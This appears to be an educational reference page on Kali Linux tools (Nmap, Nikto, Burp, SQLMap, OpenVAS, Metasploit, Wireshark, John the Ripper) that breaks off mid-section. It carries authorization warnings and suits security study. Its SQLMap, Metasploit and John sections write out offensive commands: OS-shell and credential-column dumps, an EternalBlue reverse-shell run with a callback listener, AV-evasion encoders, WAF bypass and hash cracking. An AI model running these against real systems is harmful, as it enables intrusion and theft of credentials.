Kali Linux Tools for Vulnerability Assessment and Ethical Hacking

Notes: ⚠️ Legal and ethical considerations are extremely important. Unauthorized scanning of systems you do not own or manage can be considered illegal hacking activity and may result in disciplinary or legal consequences. Always obtain written permission (such as a "Rules of Engagement" document in professional penetration testing). For safe learning, use isolated environments such as virtual labs, Capture the Flag (CTF) platforms, or intentionally vulnerable machines (like Metasploitable).

Description: Nmap (Network Mapper) is one of the most widely used open-source network scanning and reconnaissance tools. It was originally created by Gordon Lyon (Fyodor) and has become an essential tool for network administrators, penetration testers, and security professionals. Nmap works by sending specially crafted packets to target hosts and analyzing the responses to determine which hosts are alive, what services they are running, which versions of those services are in use, and even which operating systems are present. It can also detect firewalls, intrusion detection/prevention systems, and vulnerabilities. Because of its flexibility and wide range of scanning techniques, Nmap is often considered the "Swiss Army knife" of network scanning.

When & Why: Nmap is typically used during the reconnaissance and scanning phases of cybersecurity assessments, penetration tests, or vulnerability analyses. In reconnaissance, it helps identify which devices are connected to a network (host discovery) and what entry points (open ports and services) might be available. In vulnerability analysis, it provides information about outdated or misconfigured services that could be exploited. System administrators also use it for auditing: to ensure no unauthorized services are running and to verify firewall configurations. Essentially, Nmap helps assess the network’s "attack surface" — the set of possible points attackers might target. This makes it equally valuable for offense (ethical hacking, red teaming) and defense (blue teaming, network hardening).

Basic Usage (Educational Example):

To use Nmap, you typically run it from the command line. For example: `nmap -sS -sV -T4 192.168.1.1`. In this case, `-sS` initiates a SYN scan (stealthy and efficient), `-sV` tries to detect versions of the services running, and `-T4` sets the timing to "aggressive" for faster results. The IP `192.168.1.1` is the target. Scans can be run against single hosts, ranges (192.168.1.1-100), or entire subnets (192.168.1.0/24). Always remember that scanning a network without explicit permission is considered illegal and unethical. A good practice is to test on your own lab network or machines you are authorized to audit.

Common Flags/Options:

Flag	Explanation & Why
-sV	Version detection: After discovering an open port, Nmap probes it with a variety of requests and analyzes the responses to determine the service and version number (e.g., Apache httpd 2.4.41, OpenSSH 8.0). Why: Knowing exact versions helps security analysts check for specific vulnerabilities associated with that version.
-sS	SYN scan: Also called a "half-open" scan because it sends SYN packets and waits for responses without completing the TCP handshake. Why: This is faster and stealthier compared to full connect scans, making it one of the most common techniques in reconnaissance. Many IDS/IPS systems log fewer alerts from SYN scans than from full connections.
-sN	TCP Null scan: Sends TCP packets with no flags set at all. Why: Exploits quirks in how different operating systems handle unexpected packets. Some firewalls or filtering devices may not detect these packets properly, allowing hidden ports to be discovered.
-sT	TCP Connect scan: Completes the full TCP handshake (SYN → SYN-ACK → ACK). Why: This scan is more "noisy" and easier to detect, but it works even when you don’t have root/administrator privileges (since SYN scans often require elevated privileges). Used when stealth is less important but accuracy is critical.
-sU	UDP scan: Sends packets to detect services running on UDP ports (e.g., DNS on 53, SNMP on 161, TFTP, DHCP). Why: Many critical services use UDP, and they might go unnoticed if only TCP scans are used. However, UDP scanning is slower and more resource-intensive because of how UDP works (no handshake mechanism).
-T4	Timing template: Nmap allows you to adjust scan speed using templates from 0 (paranoid, extremely slow) to 5 (insane, maximum speed). -T4 is a good balance for fast scans on stable networks. Why: Faster scans save time, but they also generate more traffic, making them easier to detect and potentially impacting the target system performance.
-O	OS detection: Analyzes responses to different probes (TCP/IP fingerprinting) to guess the operating system and sometimes the exact version (e.g., Windows 10, Ubuntu 20.04). Why: Identifying the OS helps attackers choose exploits tailored to that platform, and defenders can verify which OSes are running on their network.
-A	Aggressive scan: Combines several advanced features in one: OS detection, version detection, default scripts, and traceroute. Why: Provides a detailed, all-in-one report. However, it is very noisy and easily detected by security systems, so it’s better for lab use or when stealth is not required.
-p-	Port range scan: By default, Nmap scans the 1000 most common ports. Using -p- forces it to check all 65,535 possible ports. Why: Ensures you don’t miss services running on unusual or high-numbered ports (e.g., custom web apps on 8080, backdoors on random ports).
--script=vuln	Nmap Scripting Engine (NSE): Runs prebuilt vulnerability detection scripts against the target. Why: Automates checks for known vulnerabilities such as Heartbleed, SMB exploits, or misconfigurations. Great for quick vulnerability assessments but should not replace dedicated vulnerability scanners.
-oN <file>	Normal output: Saves results to a plain text file. Why: Easy for humans to read, useful for record-keeping and reporting.
-oX <file>	XML output: Saves scan results in structured XML format. Why: Useful for integration with other tools, parsers, or custom scripts that process the results automatically.
-oG <file>	Grepable output: Saves results in a format that can be easily searched or filtered using command-line tools like grep or awk. Why: Speeds up parsing and automation when working with large networks.

Examples:

• nmap -sP 192.168.1.0/24

  Performs a "ping scan" across an entire subnet. It does not scan for ports or services, only checks which hosts are up. Useful as a first step to identify active devices on a network.

• nmap -p 22,80 -sV 192.168.1.10

  Scans for two specific ports (22 for SSH, 80 for HTTP) and attempts to identify the version of the services running on those ports. Useful for targeted scans when you know which services to check.

• nmap -sU -T3 192.168.1.15

  Performs a UDP scan with moderate timing (T3). Helps identify UDP-based services such as DNS, SNMP, or TFTP on a single host without overwhelming the network.

• nmap -p- --script=vuln -oN vuln_scan.txt 192.168.1.20

  Scans all 65,535 ports, runs vulnerability detection scripts, and saves the results into a text file named vuln_scan.txt. Provides a comprehensive look at possible weaknesses.

• nmap -A 10.0.0.5

  Runs an aggressive scan that includes OS detection, service version detection, traceroute, and default scripts. Great for in-depth analysis of a single host, but very noisy on the network.

Tips:

• List Scripts: Nmap comes with hundreds of NSE scripts for tasks like brute-forcing, vulnerability detection, malware discovery, and more. To see available scripts on Linux, run: ls /usr/share/nmap/scripts/
• Get Script Help: To see what a script does before running it, use: nmap --script-help=<script-name>. This provides usage details, author information, and categories (e.g., "auth", "vuln", "brute").

Close

Show Advanced Tips

Notes: ⚠️ Legal and ethical considerations apply: Scanning systems without permission is considered unauthorized access and may be illegal. Because Nikto sends thousands of requests during scans, it can trigger alerts, overwhelm weak servers, or cause logs to fill rapidly. Best practice: Run it in controlled environments (e.g., penetration testing labs, authorized client networks) and combine it with other tools for a complete security assessment.

Description: Nikto is an open-source web server scanner that automates the process of checking web servers for known vulnerabilities and misconfigurations. It tests for over 6,700 potentially dangerous files/CGIs, outdated or vulnerable software versions, insecure HTTP headers, default files or installations, and various server misconfigurations. Unlike general-purpose vulnerability scanners, Nikto focuses specifically on web servers and their associated technologies. It does not attempt to exploit vulnerabilities; instead, it identifies them so administrators and testers can remediate issues before attackers do.

When & Why: Nikto is used during the vulnerability scanning phase of a penetration test or security assessment. It helps identify weaknesses in web servers such as: - Outdated web server software (e.g., Apache, Nginx, IIS) that might contain known vulnerabilities. - Dangerous or default files (e.g., phpinfo.php, test.php, sample scripts). - Potential injection points (SQL, command, or local file inclusion). - Misconfigured servers (e.g., directory listing enabled, missing security headers, SSL/TLS misconfigurations). By running Nikto, security teams can harden web infrastructure by addressing these issues early. Web servers are often the first point of contact exposed to the internet, making them high-value targets for attackers.

Basic Usage (Educational Example):

To run Nikto, you use it from the command line. A typical usage example is: `nikto -h http://192.168.1.100 -T 35 -o report.txt`. Here, `-h` specifies the target host, `-T 35` tunes the scan to look for misconfigurations and SQL injection vulnerabilities, and `-o report.txt` saves the scan results into a file. You can also specify output formats (e.g., HTML or XML) for reporting. ⚠️ Important: Nikto is very noisy, meaning it generates a lot of HTTP requests that are easily detected by intrusion detection systems (IDS) and web application firewalls (WAFs). It is not a stealth tool. Use only on systems you own or are explicitly authorized to test.

Common Flags/Options:

Flag	Explanation & Why
-h	Target host: Specifies the web server to scan (e.g., http://192.168.1.100). Can be an IP address, domain name, or even a file containing a list of hosts. This is the most essential option since Nikto needs to know where to direct its tests.
-T	Tuning: Allows you to specify scan categories using numeric IDs (e.g., -T 35 runs checks for misconfigurations (3) and SQL injection (5)). Why: Speeds up scanning and focuses on specific vulnerability types instead of running all checks, which can save time and reduce noise.
-o	Output file: Saves scan results to a file. Example: -o report.txt. Why: Helpful for documentation, later review, or when generating reports for clients or professors in a classroom/lab setting.
-Format	Output format: Lets you choose how the results are saved (txt, csv, html, nbe, xml). Why: Different formats are useful in different contexts: text for reading, CSV for spreadsheets, HTML for formatted reports, and XML for importing into other security tools.
-evasion	IDS/IPS/WAF evasion: Applies techniques such as encoding requests, inserting extra characters, or altering request order. Why: Useful for testing how well an organization’s intrusion detection or prevention systems handle obfuscated malicious traffic. Example: -evasion 1 applies the first evasion technique.
-Plugins	Specify which plugins to run. Example: -Plugins "apache(2);headers". Why: This allows you to run only targeted checks (e.g., Apache vulnerabilities, header checks) instead of the full database, which can make scans more efficient and focused.
-p	Port: Specify a custom port instead of the default (80 for HTTP, 443 for HTTPS). Example: -p 8080. Why: Many web applications run on non-standard ports (e.g., Tomcat on 8080, proxy interfaces on 3128). Ensures those services are scanned too.
-ssl	Force SSL: Ensures Nikto connects over HTTPS instead of plain HTTP. Example: -ssl https://target.com. Why: Important for scanning secured web applications that only accept encrypted traffic. Also helps test SSL/TLS-related issues.

Examples:

• nikto -h http://192.168.1.100

  Performs a basic scan of a web server over HTTP, checking for default files, outdated software, and common misconfigurations.

• nikto -h https://192.168.1.100 -p 8443 -ssl

  Scans a secure web server running on port 8443 using HTTPS. Useful for web applications that are not hosted on the default port 443.

• nikto -h http://192.168.1.100 -T 9 -o scan.txt -Format txt

  Scans only for "interesting files/CGIs" using tuning ID 9 and saves the results in a plain text file. This is faster and more focused than a full scan.

• nikto -h http://192.168.1.100 -Plugins "apache(2)"

  Runs only Apache-specific plugin checks. This is helpful when you know the target is an Apache server and want a focused assessment.

• nikto -h http://test.site -evasion 1

  Uses the first IDS evasion technique to obfuscate requests. This can test how well the target’s IDS/WAF detects and responds to disguised scanning activity.

Tips:

• Update Database: Nikto relies on its vulnerability database. Keep it updated with: perl nikto.pl -update. This ensures it can detect the latest issues.
• Combine With Proxy: Run Nikto through an intercepting proxy like Burp Suite to analyze requests and responses in more detail.
• Schedule Scans: Nikto can be automated with cron jobs or scripts to run regularly against your servers, helping detect new misconfigurations over time.
• Log Analysis: Always check web server logs after a Nikto scan to understand how much "noise" it generates and how defenders could detect such scans.

Close

Show Advanced Tips

Notes: ⚠️ Legal and ethical considerations are extremely important. Unauthorized scanning of systems you do not own or manage can be considered illegal hacking activity and may result in disciplinary or legal consequences. Always obtain written permission (such as a "Rules of Engagement" document in professional penetration testing). For safe learning, use isolated environments such as virtual labs, Capture the Flag (CTF) platforms, or intentionally vulnerable machines (like Metasploitable).

Description: Burp Suite is a powerful framework for web application security testing. It acts as a man-in-the-middle proxy between your browser and the target web server, allowing you to intercept, inspect, modify, and replay HTTP(S) traffic. Burp helps identify and exploit common vulnerabilities such as SQL Injection (SQLi), Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), insecure cookies, session mismanagement, and misconfigured authentication. Burp Suite has both a Community Edition (free) and a Professional Edition (with automated scanning, advanced features, and extensions).

When & Why: Use Burp Suite when performing penetration tests, bug bounty hunting, or general web application security assessments. It is most useful when you need to: - Intercept and analyze live HTTP/HTTPS traffic. - Modify and replay requests to test input validation and business logic. - Automate scanning for vulnerabilities (Pro only). - Perform brute-force, fuzzing, or parameter manipulation with Intruder. - Reuse or chain requests with Repeater and Sequencer. - Extend functionality with BApps (Burp extensions). Always use Burp Suite responsibly and only against applications you are authorized to test.

Basic Usage (Educational Example):

1. Launch Burp Suite with `burpsuite`.
2. Go to the **Proxy** tab → Options → confirm that Proxy Listener is active on 127.0.0.1:8080.
3. Configure your browser (or use Burp’s embedded Chromium browser) to proxy traffic through 127.0.0.1:8080.
4. (Optional) Import Burp’s CA certificate into your browser to intercept HTTPS traffic without warnings.
5. Visit the target web app through the proxy-enabled browser — requests will appear under Proxy → Intercept.
6. Forward, drop, or modify requests, then explore other tabs:
   - **Target**: Site map and scope management.
   - **Repeater**: Craft and resend requests manually.
   - **Intruder**: Automate attacks such as fuzzing, brute force, or parameter injection.
   - **Scanner (Pro)**: Automated vulnerability scanning.
   - **Sequencer**: Analyze session tokens for randomness.
   - **Decoder**: Encode/decode payloads (Base64, URL, hex, etc.).
   - **Comparer**: Compare requests/responses to identify subtle differences.
   - **Extender**: Add community/pro extensions (BApp Store).
7. Save your project frequently when working on long engagements.

⚠️ Ethical reminder: Only intercept and test traffic for apps you own or have explicit authorization to assess.

Common Flags/Options:

Flag	Explanation & Why
--project-file=<file>	Open or create a project file to save all captured requests, configurations, and findings. Example: `burpsuite --project-file=mytest.burp`
--config-file=<file>	Load a specific configuration file (e.g., proxy settings, UI layout, scanning options). Example: `burpsuite --config-file=settings.json`
--user-config-file=<file>	Load personal user preferences such as hotkeys, themes, or proxy defaults.
--unpause-spider-and-scanner	Automatically unpauses the Spider and Scanner when starting Burp (Pro only).
--use-defaults	Ignore previous configurations and launch Burp with default settings.
--collaborator-server=<url>	Specify a custom Burp Collaborator server for out-of-band testing (useful for advanced SSRF/XSS detection).
--disable-extensions	Start Burp without loading extensions (useful for troubleshooting).

Examples:

• burpsuite

  Start Burp Suite with default settings (Community or Pro).

• burpsuite --project-file=bank_test.burp

  Resume testing a previously saved project file.

• burpsuite --config-file=burp_config.json

  Launch Burp with a predefined configuration (proxy/scanner settings).

• burpsuite --unpause-spider-and-scanner

  Automatically begin crawling and scanning as soon as Burp starts (Pro only).

• burpsuite --collaborator-server=collab.myserver.com

  Use a custom Burp Collaborator server for external interaction tests (e.g., blind XSS/SSRF).

Tips:

• Setup: Install the Burp CA certificate in your browser to properly intercept HTTPS traffic without SSL warnings.
• Scope Management: Define target scope early to avoid clutter and prevent accidentally testing unrelated domains.
• Intruder Payloads: Use payload lists (wordlists, fuzzing strings, brute-force dictionaries) to expand Intruder attacks.
• Repeater Use: Repeater is ideal for testing small input variations or confirming vulnerabilities manually.
• Bapp Store: Explore the BApp Store for extensions (e.g., JSON Beautifier, ActiveScan++).

Close

Show Advanced Tips

Notes: ⚠️ Legal and ethical considerations are extremely important. Unauthorized scanning of systems you do not own or manage can be considered illegal hacking activity and may result in disciplinary or legal consequences. Always obtain written permission (such as a "Rules of Engagement" document in professional penetration testing). For safe learning, use isolated environments such as virtual labs, Capture the Flag (CTF) platforms, or intentionally vulnerable machines (like Metasploitable).

Description: SQLMap is a powerful open-source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities. It supports multiple database management systems (DBMS) including MySQL, PostgreSQL, Oracle, Microsoft SQL Server, SQLite, and more. SQLMap can enumerate databases, extract tables and columns, dump sensitive data, access the underlying file system, and even gain remote shell access in certain scenarios. It is widely used by penetration testers, bug bounty hunters, and security researchers.

When & Why: Use SQLMap when assessing web applications that interact with databases, especially if you suspect SQL injection flaws. SQL injection is one of the OWASP Top 10 most critical vulnerabilities, as it can allow attackers to: - Extract or modify sensitive data (usernames, passwords, financial data). - Bypass authentication or escalate privileges. - Interact with the underlying file system. - Execute operating system commands in certain cases. SQLMap saves time by automating payload generation, testing multiple injection techniques, and handling complex injection scenarios that would be tedious to exploit manually.

Basic Usage (Educational Example):

Basic usage:
`sqlmap -u "http://192.168.1.100/page.php?id=1" --dbs --batch`

If authentication is required, include cookies:
`sqlmap -u "http://192.168.1.100/page.php?id=1" --cookie="PHPSESSID=abc123; security=high" --dbs --batch`

Explanation of core options:
- `-u`: Target URL with a suspected injectable parameter.
- `--cookie`: Passes session cookies for authenticated scans.
- `--level`: Increases the depth of testing (default is 1, max is 5).
- `--risk`: Sets how intrusive/aggressive the tests are (1–3).
- `--dbs`: Enumerates available databases.
- `--batch`: Non-interactive mode (useful for automation).

⚠️ Always test only with explicit authorization and never against systems you do not own.

Common Flags/Options:

Flag	Explanation & Why
--level=5	Sets the thoroughness of testing (1-5). Level 5 tests more parameters and injection points. Example: `sqlmap -u URL --level=5` Why: More detailed but slower scans.
--risk=3	Defines how aggressive the tests are (1-3). Risk 3 enables advanced tests like time-based injections. Example: `sqlmap -u URL --risk=3` Why: Detects deeper vulnerabilities, but may be more intrusive.
-p	Specifies which parameter to test for injection. Example: `sqlmap -u URL -p id` Why: Focuses testing, making it faster and more efficient.
--batch	Runs SQLMap without prompting for user input, using default answers. Example: `sqlmap -u URL --batch` Why: Enables automated scans or scripting.
--cookie	Send HTTP cookies along with requests. Example: `sqlmap -u URL --cookie="SESSIONID=xyz; logged_in=true"` Why: Needed for authenticated scans or to maintain session state.
--os-shell	Attempt to gain a command shell on the underlying operating system (if possible). Example: `sqlmap -u URL --os-shell`. Why: Post-exploitation to demonstrate full compromise.
--dump	Extracts (dumps) database entries from specified tables or columns. Example: `sqlmap -u URL -D database_name -T users -C username,password --dump`. Why: Retrieve actual stored data once injection is confirmed.
--threads=10	Enable multi-threading to speed up testing. Example: `sqlmap -u URL --threads=10`. Why: Faster scans, but can increase load on the target.
--crawl=3	Crawl the target site to discover URLs up to the given depth. Example: `sqlmap -u http://target.com --crawl=3`. Why: Expands coverage automatically.
--schema	Enumerates the database schema (databases, tables, columns). Example: `sqlmap -u URL --schema`. Why: Map the structure of the database before dumping.
--tables	Lists all tables in a specific database. Example: `sqlmap -u URL -D database_name --tables`. Why: Narrow down which tables are worth extracting data from.
--columns	Lists all columns in a specific table. Example: `sqlmap -u URL -D database_name -T users --columns`. Why: Identify sensitive columns like username, password, email, etc.

Examples:

• sqlmap -u "http://192.168.1.100/page.php?id=1" --dbs --batch

  Quickly enumerate all databases on the target URL without interactive prompts.

• sqlmap -u "http://192.168.1.100/page.php?id=1" --level=5 --risk=3 --batch

  Perform a thorough and aggressive scan on the target, testing many injection points.

• sqlmap -u "http://192.168.1.100/page.php?id=1" -p id --dump --batch

  Focus testing on the "id" parameter and dump the database content if injectable.

• sqlmap -u "http://192.168.1.100/page.php?id=1" --cookie="PHPSESSID=abc123; security=high" --dbs --batch

  Scan a target that requires authentication via cookies to access restricted pages.

• sqlmap -u "http://target.com/index.php" --os-shell --batch

  Attempt to spawn an interactive operating system shell if injection allows it.

• sqlmap -u "http://target.com/" --crawl=3 --batch

  Crawl the website up to 3 levels deep to automatically find injectable URLs.

• sqlmap -u "http://target.com/page.php?id=1" --schema

  Enumerate the database schema (databases, tables, columns).

• sqlmap -u "http://target.com/page.php?id=1" -D mydb --tables

  List all tables inside the "mydb" database.

• sqlmap -u "http://target.com/page.php?id=1" -D mydb -T users --columns

  Enumerate all columns in the "users" table.

• sqlmap -u "http://target.com/page.php?id=1" -D mydb -T users -C username,password --dump

  Dump only the username and password columns from the "users" table.

Tips:

• Authentication: Use --cookie or --auth-type/--auth-cred for authenticated targets.
• Speed: Combine --threads with --batch to accelerate testing on large targets.
• Database Focus: Use -D (database), -T (table), and -C (column) switches to narrow extraction scope.
• Bypass: Use --random-agent and --tamper scripts to bypass WAF/IDS filtering.
• Logging: Always save results with -o or --output-dir for reporting.

Close

Show Advanced Tips

Description: OpenVAS (Open Vulnerability Assessment Scanner), part of the Greenbone Vulnerability Management (GVM) framework, is an open-source vulnerability scanner that identifies security issues across networks, servers, applications, and databases. It continuously updates its vulnerability feed (Greenbone Community Feed / Greenbone Enterprise Feed) to detect thousands of CVEs, misconfigurations, and compliance issues. OpenVAS is widely used for vulnerability management, penetration testing prep, and compliance auditing.

When & Why: Use OpenVAS when you need a reliable and automated way to detect vulnerabilities across large networks. It is especially useful for: - Regular vulnerability scans to identify risks before attackers do. - Compliance audits (e.g., PCI DSS, ISO 27001, HIPAA). - Security monitoring in continuous integration (CI/CD) pipelines. - Prioritizing remediation based on severity (CVSS scoring). Unlike manual testing, OpenVAS automates large-scale scans, integrates with reporting workflows, and provides actionable remediation guidance.

Basic Usage (Educational Example):

Step-by-step usage example:
1. Initialize OpenVAS with setup:
`gvm-setup`
(This downloads vulnerability feeds and configures the scanner.)

2. Start the scanner services:
`gvm-start`

3. Access the web interface:
`http://127.0.0.1:9392`
(Login with your admin credentials; a random password is generated during setup.)

4. Create a new scan task:
- Define the target (single host, subnet, or range).
- Select a scan configuration (Full and fast, Full and very deep, etc.).
- Name your task for easy tracking.

5. Run the scan and monitor via the web interface or CLI.

6. Review detailed reports, filter vulnerabilities by severity, and apply remediation recommendations.

⚠️ Always ensure you have permission before scanning, as scans can disrupt services.

Common Flags/Options:

Flag	Explanation & Why
gvm-setup	Initializes OpenVAS by downloading the latest vulnerability feeds and configuring services. Run this before first use or after feed updates.
gvm-start	Starts all Greenbone Vulnerability Manager (GVM) services including scanner and web UI.
gvm-stop	Stops all running GVM services gracefully. Use to shut down the scanner.
gvm-cli --pretty	Runs OpenVAS commands via CLI with formatted, human-readable output. Useful for automation or scripting.
gsad --http-only	Launches the Greenbone Security Assistant (GSA) web UI without HTTPS. Safer for local-only environments.
omp -u admin -w password -T	Run OpenVAS Management Protocol commands directly (deprecated but still used). Example: list tasks, reports, or start scans from CLI.
gvmd --get-scans	Lists all available scan configurations. Useful for selecting the right scan type (fast vs. deep).
gvmd --get-users	List all users in the GVM system. Useful for multi-user management.

Examples:

• gvm-setup

  Initialize OpenVAS by setting up feeds and configuring services.

• gvm-start

  Start OpenVAS services and make the web UI accessible.

• gvm-stop

  Stop all services safely when done scanning.

• gvm-cli --pretty -c "get_tasks"

  List all existing scan tasks with readable output.

• gvm-cli --pretty -c "get_reports"

  Retrieve existing reports directly from CLI in readable format.

• gvmd --get-scans

  List all scan configurations (Full and fast, Full and deep, Host discovery, etc.).

• gsad --http-only

  Run the web UI without HTTPS (only recommended for testing locally).

• gvm-cli socket --xml "<create_target><name>LocalNet</name><hosts>192.168.1.0/24</hosts></create_target>"

  Create a new scan target (local subnet) directly via CLI.

Tips:

• Feed Updates: Run `greenbone-nvt-sync` (or `gvm-feed-update`) regularly to keep vulnerability checks current.
• Performance: Use "Full and fast" scans for routine checks; "Full and very deep" only when needed, as it is resource-heavy.
• Scoping: Define scan targets carefully to avoid accidental scanning of unauthorized systems.
• Reporting: Export reports in PDF, XML, or CSV formats for compliance or auditing.
• Automation: Combine gvm-cli with cron jobs to automate periodic scans.

Close

Show Advanced Tips

Notes: ⚠️ Only scan or try networks and systems you own or are authorized to test.

Description: Metasploit is a comprehensive penetration testing framework offering a suite of exploits, payloads, auxiliary modules, and post-exploitation tools for security testing across multiple platforms including Windows, Linux, macOS, and network devices. It is widely used in ethical hacking, red teaming, and security research to validate vulnerabilities and simulate real-world attacks.

When & Why: Use Metasploit when performing exploitation and post-exploitation phases of a security assessment. It helps to: - Validate discovered vulnerabilities safely. - Simulate realistic attacks to assess system resilience. - Perform privilege escalation and lateral movement within a network. - Test payload effectiveness and intrusion detection responses. Always use in a controlled lab environment or on systems with explicit permission.

Basic Usage (Educational Example):

Step-by-step usage example:
1. Launch Metasploit Framework in quiet mode:
`msfconsole -q`

2. Search for relevant modules:
`search smb`
(Lists exploits, auxiliary scanners, and payloads related to SMB.)

3. Select an exploit module:
`use exploit/windows/smb/ms17_010_eternalblue`

4. Configure the target and payload options:
`set RHOSTS 192.168.1.101`
`set LHOST 192.168.1.50`
`set PAYLOAD windows/meterpreter/reverse_tcp`

5. Check if the target is vulnerable:
`check`

6. Run the exploit in background mode:
`exploit -j`

7. Post-exploitation:
- Use `sessions -l` to list active sessions.
- Interact with a session: `sessions -i <id>`.
- Gather information with post modules, e.g., `use post/windows/gather/enum_users`.

⚠️ Only test systems you own or have explicit permission to assess.

Common Flags/Options:

Flag	Explanation & Why
set LHOST <IP>	Sets the local (attacker) IP for reverse connections (e.g., 192.168.1.50). Why: Enables reverse shells to connect back to the attacker's machine.
set RHOSTS <IP>	Sets the target (remote) IP or range (e.g., 192.168.1.101). Why: Specifies the system to exploit.
set PAYLOAD <payload>	Selects the payload (e.g., windows/meterpreter/reverse_tcp). Why: Defines the code executed on the target after exploitation.
exploit -j	Runs the exploit in the background as a job. Why: Allows multitasking within msfconsole.
-q	Quiet mode for msfconsole startup. Why: Reduces verbose output for a cleaner interface.
show options	Displays configurable options for the selected module. Why: Ensures correct settings before running the exploit.
check	Tests if the target is vulnerable without executing the exploit. Why: Reduces risk of unintended impact during testing.
set ENCODER <encoder>	Encodes the payload to evade basic antivirus or intrusion detection systems (e.g., shikata_ga_nai).
set SESSION <id>	Specifies which Meterpreter session to use for post-exploitation modules.

Examples:

• msfconsole -q; use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.1.101; set LHOST 192.168.1.50; exploit

  Launches EternalBlue exploit against a Windows target with a reverse shell payload.

• msfconsole -q; use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run

  Performs a TCP port scan on a subnet to identify open ports.

• msfconsole -q; use exploit/multi/http/struts2_rest_xstream; set RHOSTS 192.168.1.200; set TARGETURI /struts2-rest-showcase/orders; exploit

  Exploits a Struts2 vulnerability on a web server with a specific URI.

• msfconsole -q; use post/windows/gather/enum_users; set SESSION 1; run

  Enumerates users on a compromised Windows system using an active session.

• msfconsole -q; use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run

  Scans a subnet for SMB services and their versions.

• msfconsole -q; use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.50; exploit

  Sets up a listener to receive a Meterpreter session from a reverse shell payload.

• msfconsole -q; use post/windows/manage/migrate; set SESSION 1; run

  Migrate Meterpreter to another process for stability and privilege escalation.

Tips:

• List Modules: Use `search <keyword>` to find exploits, payloads, or auxiliary modules (e.g., `search smb`).
• Get Module Help: Use `info` or `show info` to view detailed module documentation.
• Session Management: List sessions with `sessions -l` and interact using `sessions -i <id>`.
• Payload Testing: Always test payloads in a safe lab environment before using on live systems.

Close

Show Advanced Tips

Notes: ⚠️ Only capture traffic on networks and systems you own or are explicitly authorized to monitor.

Description: Wireshark is a powerful network protocol analyzer for capturing, inspecting, and dissecting network packets in real-time or from saved captures. It supports hundreds of protocols and allows detailed analysis of packet headers, payloads, and protocol interactions. Widely used in network troubleshooting, security analysis, and educational labs.

When & Why: Use Wireshark when performing network troubleshooting, protocol analysis, or security assessments. It helps to: - Detect anomalies, unusual traffic, or suspicious behavior. - Identify potential data leaks or unencrypted sensitive traffic. - Monitor network performance and bottlenecks. - Understand protocol behavior for educational or forensic purposes. Always capture traffic only on networks you own or have permission to monitor.

Basic Usage (Educational Example):

GUI Usage:
1. Launch Wireshark: `wireshark &`
2. Select the network interface to capture from (e.g., eth0, wlan0).
3. Apply display filters (e.g., `ip.src == 192.168.1.100` or `http.request.method == GET`).
4. Analyze packets in detail by expanding protocol layers in the packet pane.
5. Export packets or specific selections for reporting or offline analysis.

CLI Usage with Tshark:
1. Capture and save traffic: `tshark -i eth0 -f "host 192.168.1.100" -w capture.pcap`
2. Read from a saved capture: `tshark -r capture.pcap -Y "tcp.port == 443" -T fields -e ip.src -e ip.dst`
3. Limit capture: `tshark -i wlan0 -c 100 -f "port 22"` to capture only 100 SSH packets.
4. Generate statistics: `tshark -r capture.pcap -z io,phs` for protocol hierarchy statistics.
Always work on authorized networks.

Common Flags/Options:

Flag	Explanation & Why
-i <interface>	Specifies the network interface to capture packets from (e.g., eth0, wlan0). Why: Targets the relevant traffic.
-f <filter>	Sets a capture filter using Berkeley Packet Filter syntax (e.g., "host 192.168.1.100"). Why: Limits captured data to relevant traffic for efficiency.
-w <outfile>	Saves captured packets to a file (e.g., capture.pcap). Why: Enables offline analysis or sharing.
-r <infile>	Reads packets from a saved capture file. Why: Allows reviewing past captures or forensic analysis.
-Y <display filter>	Applies a display filter in Tshark or GUI (e.g., `-Y "http.request"`). Why: Filters shown packets without affecting the capture process.
-c <count>	Limits capture to a set number of packets. Why: Prevents excessive data collection and memory overload.
-z <statistics>	Generates protocol statistics (e.g., `-z io,phs`). Why: Summarizes traffic patterns and helps quickly identify anomalies.
-a duration:<seconds>	Stops capturing after a specified duration. Why: Useful for timed captures in monitoring or lab exercises.
-V	Displays verbose output showing full packet details in CLI. Why: Useful for deep packet inspection.

Examples:

• wireshark -i eth0 -k

  Launch GUI and immediately start capturing on eth0.

• tshark -i wlan0 -f "port 80" -w http_traffic.pcap

  Capture HTTP traffic on wlan0 and save it to a file.

• tshark -r capture.pcap -Y "ip.src == 192.168.1.100" -T fields -e ip.dst

  Extract destination IPs from captured packets with a specific source IP.

• tshark -i eth0 -c 50 -f "tcp port 22"

  Capture 50 SSH packets for analysis.

• wireshark -Y "http.request.method == GET"

  Filter GUI capture to only display HTTP GET requests.

• tshark -i eth0 -a duration:60 -w capture_1min.pcap

  Capture packets for 60 seconds and save to a file.

• tshark -r capture.pcap -z conv,tcp

  Analyze TCP conversations in a capture file for connection-level insights.

Tips:

• List Interfaces: List interfaces: `tshark -D` or check available interfaces in the Wireshark GUI.
• Filter Help: Access filter syntax: https://www.wireshark.org/docs/man-pages/wireshark-filter.html or use GUI autocomplete.
• Color Coding: Use coloring rules to highlight traffic types (e.g., HTTP, DNS, suspicious packets) for faster visual analysis.
• Packet Export: Export selected packets for reporting or sharing with `File > Export Specified Packets` in GUI.

Close

Show Advanced Tips

Notes: ⚠️ Only test hashes from systems you own or have explicit permission to audit.

Description: John the Ripper is a fast, versatile password cracking tool designed to audit password strength. It supports a wide variety of hash types including MD5, SHA1, SHA256, SHA512, NTLM, and more. It combines dictionary attacks, brute-force, and rule-based attacks to recover passwords efficiently.

When & Why: Use John the Ripper during security audits to: - Test the strength of user passwords. - Recover lost passwords or test backups. - Identify weak credentials in systems and applications. - Enforce strong password policies by demonstrating vulnerabilities. Always perform password audits on systems you own or are explicitly authorized to test.

Basic Usage (Educational Example):

Basic wordlist attack:
`john --format=sha512 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt`
Explanation:
- `--format=<format>`: Specifies the hash type to crack.
- `--wordlist=<file>`: Uses a predefined list of common passwords.
- `hashes.txt`: File containing hashes to test.

Brute-force attack:
`john --format=sha1 --incremental hashes.txt`
- Attempts all possible character combinations for complex passwords.

Mask attack:
`john --format=sha512 --mask=?l?l?l?d?d --rules hashes.txt`
- Targets passwords with known patterns to reduce keyspace and increase efficiency.

Parallel cracking:
`john --format=nt --fork=8 --wordlist=/usr/share/wordlists/rockyou.txt nt_hashes.txt`
